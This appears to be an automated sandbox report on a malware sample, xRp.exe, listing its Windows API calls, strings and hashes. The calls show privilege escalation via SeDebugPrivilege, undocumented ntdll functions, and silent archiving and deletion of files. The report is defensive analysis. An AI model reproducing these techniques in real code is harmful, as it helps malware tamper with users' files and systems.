                                      • Instruction Fuzzy Hash: 12F090B060030C5BD724A776AD4EF593FACAB10305F101554B786F20D0DBB8E448CE11

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 412 e314e1-e314fb 413 e31541-e31547 412->413 414 e314fd-e31510 GetModuleHandleA 412->414 417 e31573-e3157a call e31638 ExitProcess 413->417 418 e31549-e3154c 413->418 415 e31512-e31518 414->415 416 e3151a-e31535 VirtualQuery 414->416 415->413 420 e31537-e31539 416->420 421 e3153b 416->421 422 e31569-e31570 418->422 423 e3154e-e31555 418->423 420->413 420->421 421->413 423->422 425 e31557-e31566 call e31af9 423->425 425->422
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00E31504
                                      • VirtualQuery.KERNEL32(00E314E1,?,0000001C), ref: 00E31525
                                      • ExitProcess.KERNEL32 ref: 00E3157A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: ExitHandleModuleProcessQueryVirtual
                                      • String ID:
                                      • API String ID: 3946701194-0
                                      • Opcode ID: 3dba1cc841353ad3ff20ed1210e80183aba6406759c39bc6cc72cfa5d66cb8eb
                                      • Instruction ID: c9c6cf8e224479dbebd4d8c8fcdce18e75b282011b357aeed1b970b91499408e
                                      • Opcode Fuzzy Hash: 3dba1cc841353ad3ff20ed1210e80183aba6406759c39bc6cc72cfa5d66cb8eb
                                      • Instruction Fuzzy Hash: B2115AB1900208EFCB20DFA6A88DA79BFA8EBC4755F10606EF402F2190D674A945DB50
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00E360DF
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E36189
                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E361A5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: Virtual$Free$Alloc
                                      • String ID:
                                      • API String ID: 1852963964-0
                                      • Opcode ID: 8634db8b7c1418a88bcc138067d6f5b5dd2bcca5d3197ff0c845852dd91f513d
                                      • Instruction ID: 543a772a15f92b0e31551ea78036128bede4983ec5d0faa841c657658ce0c8c5
                                      • Opcode Fuzzy Hash: 8634db8b7c1418a88bcc138067d6f5b5dd2bcca5d3197ff0c845852dd91f513d
                                      • Instruction Fuzzy Hash: 6F115E32600649DFCF358F68CC897DE3BA2FF45304F6A8419DD8DAB2A1DA716940CB94
                                      APIs
                                      • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,00E313EF), ref: 00E311AB
                                      • OpenProcessToken.ADVAPI32(00000000,00000028,00E313EF,?,?,?,?,?,?,00E313EF), ref: 00E311BB
                                      • AdjustTokenPrivileges.ADVAPI32(00E313EF,00000000,?,00000010,00000000,00000000), ref: 00E311EB
                                      • CloseHandle.KERNEL32(00E313EF), ref: 00E311FA
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E313EF), ref: 00E31203
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E311A5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
                                      • API String ID: 75692138-1450390661
                                      • Opcode ID: 862cedec6fa929a64ee7585b9dd25b953e800b8a98e89ff28928fa91f6b578ac
                                      • Instruction ID: f77692b0c6c052e98076d619f9585257561900f019adc1bea247a7a4241a8ae1
                                      • Opcode Fuzzy Hash: 862cedec6fa929a64ee7585b9dd25b953e800b8a98e89ff28928fa91f6b578ac
                                      • Instruction Fuzzy Hash: 7A01D2B590020DEFEB00DFE5C989AAEBFB9FB04305F1045A9E606A2250D7719E489F50
                                      APIs
                                      • strstr.MSVCRT ref: 00E323CC
                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E32464
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00E32472
                                      • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00E324A8
                                      • memset.MSVCRT ref: 00E324B9
                                      • strrchr.MSVCRT ref: 00E324C9
                                      • wsprintfA.USER32 ref: 00E324DE
                                      • strrchr.MSVCRT ref: 00E324ED
                                      • memset.MSVCRT ref: 00E324F2
                                      • memset.MSVCRT ref: 00E32505
                                      • wsprintfA.USER32 ref: 00E32524
                                      • Sleep.KERNEL32(000007D0), ref: 00E32535
                                      • Sleep.KERNEL32(000007D0), ref: 00E3255D
                                      • memset.MSVCRT ref: 00E3256E
                                      • wsprintfA.USER32 ref: 00E32585
                                      • memset.MSVCRT ref: 00E325A6
                                      • wsprintfA.USER32 ref: 00E325CA
                                      • Sleep.KERNEL32(000007D0), ref: 00E325D0
                                      • Sleep.KERNEL32(000007D0,?,?), ref: 00E325E5
                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E325FC
                                      • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00E32611
                                      • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00E32642
                                      • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00E3265B
                                      • SetEndOfFile.KERNEL32 ref: 00E3266D
                                      • CloseHandle.KERNEL32(00000000), ref: 00E32676
                                      • RemoveDirectoryA.KERNEL32(?), ref: 00E32681
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                      • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\6b1c0b84.exe
                                      • API String ID: 2203340711-961484416
                                      • Opcode ID: 5fb45a39bef77a70791b692dd2d11b5e0d0be4ae3fb640835f01b02ed99d04f0
                                      • Instruction ID: 10217f4d63008d6e244d59a587a80116b0d05f2eb3fc4be9346388fba0f5e4d0
                                      • Opcode Fuzzy Hash: 5fb45a39bef77a70791b692dd2d11b5e0d0be4ae3fb640835f01b02ed99d04f0
                                      • Instruction Fuzzy Hash: AB818CB1504308AFD7109B65DC8DEABBFECEB88705F00151EFA85B21A0D7749A49CB66
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00E31400), ref: 00E31226
                                      • GetProcAddress.KERNEL32(00000000), ref: 00E3122D
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00E31400), ref: 00E3123F
                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00E31400), ref: 00E31250
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,00E31400), ref: 00E3129E
                                      • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,00E31400), ref: 00E312B0
                                      • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,00E31400), ref: 00E312F5
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00E31400), ref: 00E3130A
                                      Strings
                                      • ntdll.dll, xrefs: 00E31219
                                      • ZwQuerySystemInformation, xrefs: 00E31212
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E31262
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$ZwQuerySystemInformation$ntdll.dll
                                      • API String ID: 1500695312-3769353041
                                      • Opcode ID: 65031c2166c1ac3be1e3b2e55862e19c9b73a3a2bdfc0931e1c1a29e28ef11a2
                                      • Instruction ID: 0d179d30fe4e39fe81b3cc892ea9f3bac9c79d94b99d6c843c792dfe5efbf500
                                      • Opcode Fuzzy Hash: 65031c2166c1ac3be1e3b2e55862e19c9b73a3a2bdfc0931e1c1a29e28ef11a2
                                      • Instruction Fuzzy Hash: 05212030605351ABD3209B66CC0CFABBEA8FF85B05F11096CF645F6290C370DA48DBA5
                                      APIs
                                      • memset.MSVCRT ref: 00E318B1
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 00E318D3
                                      • CloseHandle.KERNEL32(I%), ref: 00E318E9
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E318F0
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00E31901
                                      • CloseHandle.KERNEL32(?), ref: 00E3190A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                      • String ID: I%
                                      • API String ID: 876959470-1881045234
                                      • Opcode ID: 1f8945737868556a44bd8cc9fe7d3e73eb0d4432c00e46cfb039485dd204c73c
                                      • Instruction ID: db5a4545cda5ee71a525a4fbc0928b1c216b8aa87eb6102675d10882d4b160a8
                                      • Opcode Fuzzy Hash: 1f8945737868556a44bd8cc9fe7d3e73eb0d4432c00e46cfb039485dd204c73c
                                      • Instruction Fuzzy Hash: C6017C7290112CBFCB21ABA6DC4CDDFBF7DEF85721F104125FA15B51A0D6718A58CAA0
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00E32873,?,00000002), ref: 00E326A7
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00E32873,?,00000002), ref: 00E326B5
                                      • lstrlen.KERNEL32(?), ref: 00E326C4
                                      • ??2@YAPAXI@Z.MSVCRT ref: 00E326CE
                                      • lstrcpy.KERNEL32(00000004,?), ref: 00E326E3
                                      • lstrcpy.KERNEL32(?,00000004), ref: 00E3271F
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00E3272D
                                      • SetEvent.KERNEL32 ref: 00E3273C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                      • String ID:
                                      • API String ID: 41106472-0
                                      • Opcode ID: 56c43fe83739c6dc2a06ed92e02616269bb18364ae36273656b81940e4c6a080
                                      • Instruction ID: bf8347366812f8f84e7fe68f7222e850592f1f46f561b1a0a74882bf62973ee2
                                      • Opcode Fuzzy Hash: 56c43fe83739c6dc2a06ed92e02616269bb18364ae36273656b81940e4c6a080
                                      • Instruction Fuzzy Hash: 86114CB6500118AFCB219F27ED4C85A7FA9FB84721B14901AF694BB260D770A989DF90
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: lstrcatmemcpymemsetrandsrand
                                      • String ID: .exe
                                      • API String ID: 122620767-4119554291
                                      • Opcode ID: 5cf09c586b3e94189f769afdffb982ac3f5af2a23e859c3ae33d7e93c26cad15
                                      • Instruction ID: b1a1c2e1bb09bf172a759ac74fa653988d09f9161f342a3e80d5a5598872eb7a
                                      • Opcode Fuzzy Hash: 5cf09c586b3e94189f769afdffb982ac3f5af2a23e859c3ae33d7e93c26cad15
                                      • Instruction Fuzzy Hash: 69218E72E44290AED32913366C4CB6ABFC4CFF3715F1560DDF5853B1D2D1641989C260
                                      APIs
                                      • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E313BC
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E313DA
                                      • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E31448
                                        • Part of subcall function 00E3119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,00E313EF), ref: 00E311AB
                                        • Part of subcall function 00E3119F: OpenProcessToken.ADVAPI32(00000000,00000028,00E313EF,?,?,?,?,?,?,00E313EF), ref: 00E311BB
                                        • Part of subcall function 00E3119F: AdjustTokenPrivileges.ADVAPI32(00E313EF,00000000,?,00000010,00000000,00000000), ref: 00E311EB
                                        • Part of subcall function 00E3119F: CloseHandle.KERNEL32(00E313EF), ref: 00E311FA
                                        • Part of subcall function 00E3119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E313EF), ref: 00E31203
                                      Strings
                                      • SeDebugPrivilege, xrefs: 00E313D3
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E313A8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SeDebugPrivilege
                                      • API String ID: 4123949106-2008642442
                                      • Opcode ID: 4d190c1f08d217bd3681446957bc7b81113fe143e4ecf1c67edde3ef138dfeb3
                                      • Instruction ID: 3d5de04b2bc923393f173833ae217d486d0b96e56ec1c0381b7fdef8a37c2f56
                                      • Opcode Fuzzy Hash: 4d190c1f08d217bd3681446957bc7b81113fe143e4ecf1c67edde3ef138dfeb3
                                      • Instruction Fuzzy Hash: 23310E71D40209EAEF20EBA6CC49FEEBFB8EB44705F2151ADE515B2141D7709E45CB60
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00E31334
                                      • GetProcAddress.KERNEL32(00000000), ref: 00E3133B
                                      • memset.MSVCRT ref: 00E31359
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcmemset
                                      • String ID: NtSystemDebugControl$ntdll.dll
                                      • API String ID: 3137504439-2438149413
                                      • Opcode ID: a5d05ae71079c01347a0f816149fd6ccc7f5d38c96db38119f7b742173fce0f4
                                      • Instruction ID: 92ccb78873dbbd8b6ac24d2d273f7e33284d8aab8e3ae06f06e633ebf7f929ea
                                      • Opcode Fuzzy Hash: a5d05ae71079c01347a0f816149fd6ccc7f5d38c96db38119f7b742173fce0f4
                                      • Instruction Fuzzy Hash: B7016D7160130DAFDB10DFA5AC8DEAFBFA8FB41318F02516AF941B2180E3749649CA51
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: strrchr$lstrcmpilstrcpylstrlen
                                      • String ID:
                                      • API String ID: 3636361484-0
                                      • Opcode ID: 7d95b3de44529586bde69838d22d2276ae4ae3971a7ae11cf6220771a97832fa
                                      • Instruction ID: 7e5ce8a4297b1e5fa6207133b8df60f835dd0ede0cf1b8746043c6480d8a08fb
                                      • Opcode Fuzzy Hash: 7d95b3de44529586bde69838d22d2276ae4ae3971a7ae11cf6220771a97832fa
                                      • Instruction Fuzzy Hash: E601D6B29042196FEB205771EC4DFD67FDCDB04355F0500AAEA45F2090EA75AA88CFA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: Timerandsrand$FileSystem
                                      • String ID:
                                      • API String ID: 4106363736-0
                                      • Opcode ID: 38c698742775cef850e35479917fd28d9a9d3a1cefbc99858bdbd393823bcaa5
                                      • Instruction ID: a3a559b46a8763bf988f271e81f63237da12b5090d39e01e8a7aa9859c73a84a
                                      • Opcode Fuzzy Hash: 38c698742775cef850e35479917fd28d9a9d3a1cefbc99858bdbd393823bcaa5
                                      • Instruction Fuzzy Hash: D8E01277A1021CBFD704A7BAEC4AD9EBBACDF84161B110566F600E3254E574E9488AB4
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00E3603C
                                      • GetProcAddress.KERNEL32(00000000,00E36064), ref: 00E3604F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: kernel32.dll
                                      • API String ID: 1646373207-1793498882
                                      • Opcode ID: e5b4fb661b7672ed94523f2f207a719c61edf7a543d2a4cff428583e627676fb
                                      • Instruction ID: 4e8f94c1ff8cd65c531e6b323d3bda8b7d3ce8c047faa71fef1434b71a2f18ed
                                      • Opcode Fuzzy Hash: e5b4fb661b7672ed94523f2f207a719c61edf7a543d2a4cff428583e627676fb
                                      • Instruction Fuzzy Hash: 45F0F6B15442899FDF708E74CC48BDE3BE4EB45704F50446AEA09DB241CB348605CB24